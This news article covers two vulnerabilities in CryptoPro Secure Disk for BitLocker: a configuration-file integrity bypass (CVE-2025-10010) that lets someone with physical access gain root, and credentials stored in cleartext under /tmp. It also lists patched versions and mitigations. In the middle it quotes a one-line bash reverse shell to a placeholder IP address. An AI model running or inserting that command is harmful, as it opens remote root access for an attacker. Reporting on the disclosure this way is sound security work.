Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution.
These flaws could allow an attacker with physical access to a device to gain persistent root access and steal sensitive credentials.
The issues identified by security researchers at SEC Consult Vulnerability Lab highlight significant risks for organizations that rely on this software for data protection.
| CVE | CVSS | Details |
|---|---|---|
| CVE-2025-10010 | N/A | Integrity bypass enables root code execution. |
| N/A | N/A | Cleartext /tmp data exposes credentials. |
Integrity Validation Bypass
The first vulnerability, designated as CVE-2025-10010, involves an integrity validation bypass.
CryptoPro Secure Disk boots a minimal Linux operating system to authenticate users, then decrypts the Windows partition with BitLocker.
This Linux system resides on an unencrypted partition, accessible to anyone who can physically reach the hard drive or boot the system from an external medium.
While the system uses the Linux kernel’s Integrity Measurement Architecture (IMA) to verify files, researchers found that IMA does not validate certain configuration files.
bash -c ‘exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 <&1' &
By manipulating these files, an attacker can execute arbitrary code with root privileges. This could allow them to plant a backdoor and monitor or access data during execution without triggering any system errors.
| Product | Vulnerable Versions | Fixed Versions |
|---|---|---|
| CPSD CryptoPro Secure Disk | < 7.6.6 / < 7.7.1 | 7.6.6 / 7.7.1 |
ClearText Storage of Sensitive Data
The second issue concerns the storage of sensitive data in clear text. When users forget their credentials, CryptoPro Secure Disk offers an online support feature that connects to a predefined network.
According to SEC Consult, to facilitate this connection, the system stores necessary secrets, such as certificates and passwords, in cleartext within the temporary ‘/tmp’ folder.
If an attacker has already gained access to the Linux environment, perhaps through the first vulnerability, they can easily read these files.
This information could then be used to access internal networks or bypass network access controls, further compromising the organization’s infrastructure.
The vendor, CPSD, was notified of these issues in June 2025 and has since provided patches. Versions 7.6.6 and 7.7.1 address the vulnerabilities.
Organizations using CryptoPro Secure Disk should update their software immediately. If updating is not immediately possible, the vendor recommends encrypting the PBA partition, a feature available since version 7.6.0.
Starting with version 7.7, this encryption is enabled by default, mitigating the risk of unauthorized file modifications.
SEC Consult also advises organizations to conduct thorough security reviews of their encryption solutions to identify and address any other potential weaknesses.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
